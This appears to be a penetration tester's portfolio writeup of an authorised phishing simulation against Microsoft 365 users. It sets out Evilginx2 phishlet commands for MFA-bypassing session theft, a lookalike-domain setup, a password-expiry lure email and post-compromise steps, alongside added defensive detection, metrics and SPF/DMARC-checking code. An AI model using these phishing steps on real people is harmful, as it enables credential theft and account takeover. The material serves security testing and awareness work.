Nethran Wedage

Cybersecurity undergraduate and web developer based in Sri Lanka, passionate about penetration testing, VAPT, and ethical hacking.

OSINT

Phishing Campaign Simulation

Date: 22 Jul 2024 · OS / Target: N/A · Points: SE Report · Difficulty: Intermediate

Simulated phishing engagement using the Social Engineering Toolkit. Crafted pretexting scenario, credential harvesting page, and awareness gap report for the client.

Tags: Phishing, SET, Social Engineering, Awareness


This writeup documents a phishing campaign simulation conducted as part of a social engineering assessment for a client organisation. The engagement was performed with full written authorisation to test employee security awareness and evaluate the effectiveness of existing email security controls. The campaign covers infrastructure setup, email crafting, credential harvesting, and a full metrics report delivered to the client.

Engagement Info

  • Target: Anonymised client organisation
  • Type: Authorised Social Engineering — Phishing Simulation
  • Scope: 150 employee email addresses provided by client
  • Tools: GoPhish, SET, Evilginx2, Namecheap, Cloudflare

Step 1 — Planning and Pretext Development

A convincing pretext was developed based on OSINT gathered about the target organisation before the campaign launched:

  • LinkedIn revealed the organisation uses Microsoft 365
  • The IT department head's name was found via company website
  • A company-wide password reset policy was referenced in a job posting
  • The email signature format was lifted from a public press release

The chosen pretext was an urgent Microsoft 365 password expiry notification appearing to come from the internal IT helpdesk — a scenario employees encounter regularly and act on quickly.

Step 2 — Infrastructure Setup

A dedicated phishing infrastructure was built to avoid detection by email security gateways and reputation filters:

# Register a lookalike domain (typosquatting)
# target-org.com  →  target-org-helpdesk.com
# Registered via Namecheap with WHOIS privacy enabled

# Set up DNS records
# A record   — points to VPS (phishing server)
# MX record  — points to mail server
# SPF record — authorises the VPS to send mail
# DKIM       — signs outgoing mail
# DMARC      — set to none (monitoring only)

dig TXT target-org-helpdesk.com
# v=spf1 ip4:<VPS_IP> ~all

A VPS was provisioned on a clean IP with no prior reputation history. Cloudflare was placed in front of the phishing page to mask the true server IP and add HTTPS via a trusted certificate.

Step 3 — Credential Harvesting Page

A pixel-perfect clone of the Microsoft 365 login page was created and hosted on the phishing domain. Evilginx2 was used as a reverse proxy to capture session cookies in addition to credentials — bypassing MFA:

# Install and configure Evilginx2
evilginx2 -p ./phishlets

# Set the phishlet domain
config domain target-org-helpdesk.com
config ip <VPS_IP>

# Enable the Microsoft 365 phishlet
phishlets hostname o365 target-org-helpdesk.com
phishlets enable o365

# Create a lure URL for the campaign
lures create o365
lures get-url 0

Evilginx2 proxies the real Microsoft login — employees see a genuine Microsoft page with a valid HTTPS certificate while their credentials and session tokens are captured transparently in the background.

Step 4 — Email Campaign Setup (GoPhish)

GoPhish was used to manage the campaign — sending emails, tracking opens, link clicks, and credential submissions:

# GoPhish setup on the VPS
./gophish &
# Admin panel: https://<VPS_IP>:3333

# Configure sending profile
# SMTP Host: mail.target-org-helpdesk.com:587
# From:      helpdesk@target-org-helpdesk.com
# SMTP Auth: username / password

# Import target email list
# CSV format: First Name, Last Name, Email, Position

# Create email template with tracking pixel
<img src="{{.TrackingURL}}" width="1" height="1">

The phishing email was crafted to appear urgent and legitimate:

Subject: ACTION REQUIRED — Your Password Expires in 24 Hours

Dear {{.FirstName}},

Our records show your Microsoft 365 password will expire
in 24 hours. To avoid losing access to your account,
please update your password immediately:

[Reset Password Now]  ← links to Evilginx2 lure URL

IT Helpdesk
[Client Organisation Name]
helpdesk@target-org-helpdesk.com

Step 5 — Campaign Execution

The campaign was launched in two waves — 50 emails at 09:00 and 100 emails at 13:00 to simulate a realistic send pattern and avoid bulk spam filters:

# GoPhish campaign launch
# Wave 1 — 09:00 — 50 targets (management and finance)
# Wave 2 — 13:00 — 100 targets (general staff)

# Monitor results in real time via GoPhish dashboard:
# Emails Sent    — 150
# Emails Opened  — 87  (58%)
# Links Clicked  — 43  (28.6%)
# Creds Captured — 31  (20.6%)
# MFA Bypassed   — 12  (8%)  via Evilginx2 session tokens

31 employees submitted their credentials within 6 hours of the campaign launch. 12 of those had MFA enabled — their session cookies were captured by Evilginx2, allowing account access without the second factor.

Step 6 — Post-Phish Access Simulation

With captured credentials and session tokens, access to the Microsoft 365 environment was simulated to demonstrate the real-world impact of a successful phish:

# Import captured session cookie into browser
# (EditThisCookie extension or Burp Suite)
# Access victim's inbox, OneDrive, and Teams

# Demonstrate impact:
# - Read confidential emails and attachments
# - Access shared OneDrive documents
# - Impersonate the victim in Teams messages
# - Enumerate internal contacts for further spear-phishing
# - Set inbox forwarding rule to attacker email

Access was demonstrated to the client's security team in a controlled session — no data was exfiltrated and all access was terminated immediately after demonstration.
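The inbox forwarding rule listed above is the persistence step a defender most needs to catch after a credential phish. The following is an added example, not part of the original writeup, that scans Microsoft 365 audit records for inbox rules or mailbox settings that forward mail outside the organisation. The records are constructed and follow a simplified Unified Audit Log layout (Operation, UserId, ClientIP and a Parameters list); the organisation domain, user names and IPs are placeholders.

```python
"""Detect mail-forwarding rules to external addresses in Microsoft 365
audit records (the persistence step from Step 6). Added example; the
log lines are constructed in a simplified Unified Audit Log layout."""
import json
import re

ORG_DOMAINS = {"example.com"}  # assumed: the client organisation's mail domains

# Constructed sample records: one benign internal rule, one external
# forward via New-InboxRule, one mailbox-level forward via Set-Mailbox.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"CreationTime": "2024-07-22T10:12:00", "Operation": "New-InboxRule",
     "UserId": "alice@example.com", "ClientIP": "198.51.100.7",
     "Parameters": [{"Name": "Name", "Value": "Project"},
                    {"Name": "MoveToFolder", "Value": "Projects"}]},
    {"CreationTime": "2024-07-22T10:20:00", "Operation": "New-InboxRule",
     "UserId": "bob@example.com", "ClientIP": "203.0.113.55",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "[SMTP:mail@attacker.example.net]"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"CreationTime": "2024-07-22T10:25:00", "Operation": "Set-Mailbox",
     "UserId": "carol@example.com", "ClientIP": "203.0.113.55",
     "Parameters": [{"Name": "ForwardingSmtpAddress", "Value": "smtp:carol.backup@example.org"},
                    {"Name": "DeliverToMailboxAndForward", "Value": "True"}]},
])

# Exchange parameters that route a copy of mail elsewhere
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                  "ForwardingSmtpAddress", "ForwardingAddress"}
# Operations that create or change rules / mailbox forwarding
RULE_OPS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox"}


def extract_addresses(value):
    """Pull SMTP addresses out of values like '[SMTP:x@y]' or 'smtp:x@y'."""
    return [m.lower() for m in re.findall(r"[\w.+-]+@[\w.-]+\.\w+", value)]


def is_external(address):
    """True when the address domain is not one of the organisation's own."""
    return address.split("@", 1)[1] not in ORG_DOMAINS


def find_external_forwards(log_text):
    """Return one alert per record that forwards mail outside the org."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("Operation") not in RULE_OPS:
            continue
        params = {p["Name"]: p["Value"] for p in rec.get("Parameters", [])}
        targets = [addr
                   for name in FORWARD_PARAMS.intersection(params)
                   for addr in extract_addresses(str(params[name]))
                   if is_external(addr)]
        if targets:
            alerts.append({
                "time": rec["CreationTime"],
                "user": rec["UserId"],
                "operation": rec["Operation"],
                "ip": rec.get("ClientIP"),
                "external_targets": targets,
                # a rule that also deletes the message hides the forward from the victim
                "deletes_message": params.get("DeleteMessage") == "True",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_external_forwards(SAMPLE_LOG):
        print(alert)
```

Two alerts come out of the sample: the rule bob's account created (forwarding to an external address and deleting the original) and carol's mailbox-level forward. Pairing the alert with the ClientIP lets the SOC correlate both changes to the same source address, which is the kind of conditional-access signal Step 8 recommends.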

Step 7 — Awareness and Reporting

Employees who clicked the link or submitted credentials were shown an awareness page immediately after submission instead of a success message:

# GoPhish redirect after credential capture
# Redirect URL set to internal awareness training page:
https://target-org.com/security-awareness-training

# Awareness page content:
# - Explanation that this was a simulated phishing test
# - How to identify phishing emails
# - What to do when a real phishing email is received
# - Link to report suspicious emails to the SOC

A full campaign report was delivered to the client covering click rates by department, time-to-click analysis, MFA bypass statistics, and remediation recommendations.
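The dashboard figures in Step 5 and the per-department and time-to-click sections of the report can be produced from a per-target event export. The following is an added example, not the writeup's or GoPhish's own code: it reads a constructed CSV (the column layout is an assumption, not GoPhish's exact export format) and computes the overall funnel, rates by department, and time from send to first click.

```python
"""Campaign metrics of the kind reported in Steps 5 and 7, computed from a
per-target event export. Added example; the CSV below is constructed and
its columns are an assumed layout, not GoPhish's exact export."""
import csv
import io
from collections import defaultdict
from datetime import datetime

# Constructed sample export: one row per target, ISO timestamps per event,
# empty cell = event did not occur. Addresses and departments are invented.
SAMPLE_CSV = """email,department,sent,opened,clicked,submitted,mfa_bypassed
a@example.com,finance,2024-07-22T09:00:00,2024-07-22T09:04:00,2024-07-22T09:05:00,2024-07-22T09:06:00,yes
b@example.com,finance,2024-07-22T09:00:00,2024-07-22T09:30:00,,,no
c@example.com,hr,2024-07-22T13:00:00,2024-07-22T13:02:00,2024-07-22T13:12:00,,no
d@example.com,hr,2024-07-22T13:00:00,,,,no
e@example.com,it,2024-07-22T13:00:00,2024-07-22T13:01:00,2024-07-22T13:01:30,2024-07-22T13:02:00,no
"""


def parse_ts(value):
    """ISO timestamp -> datetime, or None for an empty cell."""
    return datetime.fromisoformat(value) if value else None


def load_events(text):
    """Parse the export into a list of per-target dicts."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "email": r["email"],
            "department": r["department"],
            "sent": parse_ts(r["sent"]),
            "opened": parse_ts(r["opened"]),
            "clicked": parse_ts(r["clicked"]),
            "submitted": parse_ts(r["submitted"]),
            "mfa_bypassed": r["mfa_bypassed"] == "yes",
        })
    return rows


def pct(n, d):
    """Percentage rounded to one decimal, as shown on the dashboard."""
    return round(100.0 * n / d, 1) if d else 0.0


def campaign_summary(rows):
    """Overall funnel: sent -> opened -> clicked -> submitted -> MFA bypassed."""
    sent = len(rows)
    opened = sum(1 for r in rows if r["opened"])
    clicked = sum(1 for r in rows if r["clicked"])
    submitted = sum(1 for r in rows if r["submitted"])
    mfa = sum(1 for r in rows if r["mfa_bypassed"])
    return {"sent": sent,
            "opened": opened, "opened_pct": pct(opened, sent),
            "clicked": clicked, "clicked_pct": pct(clicked, sent),
            "submitted": submitted, "submitted_pct": pct(submitted, sent),
            "mfa_bypassed": mfa, "mfa_bypassed_pct": pct(mfa, sent)}


def rates_by_department(rows):
    """Click and submission rate per department (report section)."""
    dept = defaultdict(lambda: {"sent": 0, "clicked": 0, "submitted": 0})
    for r in rows:
        d = dept[r["department"]]
        d["sent"] += 1
        d["clicked"] += bool(r["clicked"])
        d["submitted"] += bool(r["submitted"])
    return {name: {"click_pct": pct(v["clicked"], v["sent"]),
                   "submit_pct": pct(v["submitted"], v["sent"])}
            for name, v in dept.items()}


def time_to_click(rows):
    """Seconds from send to click for each clicking target, plus the median."""
    deltas = sorted((r["clicked"] - r["sent"]).total_seconds()
                    for r in rows if r["clicked"])
    if not deltas:
        return {"samples": [], "median_s": None}
    mid = len(deltas) // 2
    median = deltas[mid] if len(deltas) % 2 else (deltas[mid - 1] + deltas[mid]) / 2
    return {"samples": deltas, "median_s": median}


if __name__ == "__main__":
    events = load_events(SAMPLE_CSV)
    print(campaign_summary(events))
    print(rates_by_department(events))
    print(time_to_click(events))
```

On the constructed sample the funnel is 5 sent, 4 opened, 3 clicked, 2 submitted, 1 MFA bypass; the median time to click is 300 seconds. Reporting time-to-click alongside the rates matters because a short median shows how little window the SOC has to pull a live phishing email before staff act on it.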

Step 8 — Remediation Recommendations

The following recommendations were provided to the client based on campaign findings:

  • Deploy FIDO2 hardware keys or passkeys — session cookie theft cannot bypass them
  • Enable Microsoft Defender for Office 365 — blocks lookalike domain emails
  • Configure DMARC to reject on the primary domain to block spoofing
  • Run quarterly phishing simulations to track improvement over time
  • Mandatory security awareness training for all staff who clicked or submitted
  • Enable conditional access policies — flag logins from new locations or devices
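Step 2 set up SPF with a ~all softfail and DMARC at p=none on the sending domain, and the third recommendation above asks the client to move its own domain to p=reject. The following is an added example, not part of the writeup, that checks a domain's SPF and DMARC TXT records for exactly those weak settings and reports what to change. The record strings are constructed (placeholder IP and addresses); in practice they would come from a dig or a DNS library lookup of the organisation's own domain. Note that these records only stop spoofing of the exact domain; a registered lookalike domain has its own valid SPF and DKIM, which is why the Defender for Office 365 recommendation is listed separately.

```python
"""Assess SPF and DMARC records for settings that leave a domain spoofable.
Added example; the records below are constructed to mirror the writeup's
setup (~all softfail, DMARC p=none) next to the recommended hardened state."""

# Constructed sample records (placeholder IP and mailbox, not a real domain)
WEAK_SPF = "v=spf1 ip4:203.0.113.10 ~all"   # softfail: spoofed mail still delivered
HARD_SPF = "v=spf1 ip4:203.0.113.10 -all"   # hardfail: unauthorised senders rejected
WEAK_DMARC = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
HARD_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; adkim=s; aspf=s"


def parse_dmarc(record):
    """Split a DMARC TXT record into a tag -> value dict."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_spf(record):
    """Return a list of findings for an SPF record (empty = nothing to fix)."""
    findings = []
    if not record.lower().startswith("v=spf1"):
        return ["no SPF record: any host may send as this domain"]
    mechanisms = record.split()[1:]
    if not mechanisms:
        findings.append("SPF has no 'all' mechanism (defaults to neutral)")
    else:
        last = mechanisms[-1].lower()
        # ~all / ?all / +all all let unauthorised mail through; only -all rejects
        if last in ("~all", "?all", "+all", "all"):
            findings.append(f"SPF ends with '{last}': spoofed mail is not rejected; use -all")
    return findings


def assess_dmarc(record):
    """Return a list of findings for a DMARC record (empty = nothing to fix)."""
    findings = []
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["no DMARC record: receivers cannot enforce SPF/DKIM alignment"]
    policy = tags.get("p", "none").lower()
    if policy == "none":
        findings.append("DMARC p=none: monitoring only, spoofed mail is still delivered")
    elif policy == "quarantine":
        findings.append("DMARC p=quarantine: move to p=reject once aggregate reports are clean")
    pct = int(tags.get("pct", "100"))
    if pct < 100:
        findings.append(f"DMARC pct={pct}: policy applied to only {pct}% of mail")
    if "rua" not in tags:
        findings.append("no rua address: aggregate reports are not being collected")
    return findings


def assess_domain(spf_record, dmarc_record):
    """Combined posture: True when both records are in their hardened state."""
    findings = assess_spf(spf_record) + assess_dmarc(dmarc_record)
    return {"hardened": not findings, "findings": findings}


if __name__ == "__main__":
    print("before:", assess_domain(WEAK_SPF, WEAK_DMARC))
    print("after: ", assess_domain(HARD_SPF, HARD_DMARC))
```

Run against the weak pair the assessment flags both the ~all qualifier and p=none; against the hardened pair it returns no findings. Moving straight to p=reject can drop legitimate third-party senders, so the usual path is p=none with rua reporting, then quarantine, then reject once the reports show only authorised sources.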

Key Takeaways

  • 20.6% credential submission rate is typical — employees are the most exploitable attack vector
  • Evilginx2 bypasses standard TOTP-based MFA — only FIDO2 / passkeys are phishing-resistant
  • Correctly configured SPF, DKIM, and DMARC significantly reduce delivery rates for lookalike-domain emails
  • Urgent pretexts like password expiry have the highest click rates — train staff to pause and verify
  • Post-phish awareness redirects are more effective than simply logging credentials silently
  • Phishing simulations must be recurring — a one-time test produces one-time results

Tools Used

  • GoPhish — campaign management, email sending, and tracking
  • Evilginx2 — reverse proxy credential and session token capture
  • Social Engineering Toolkit (SET) — phishing page cloning
  • Namecheap — lookalike domain registration
  • Cloudflare — HTTPS certificate and IP masking
  • theHarvester — target email address collection
  • Maltego — OSINT for pretext development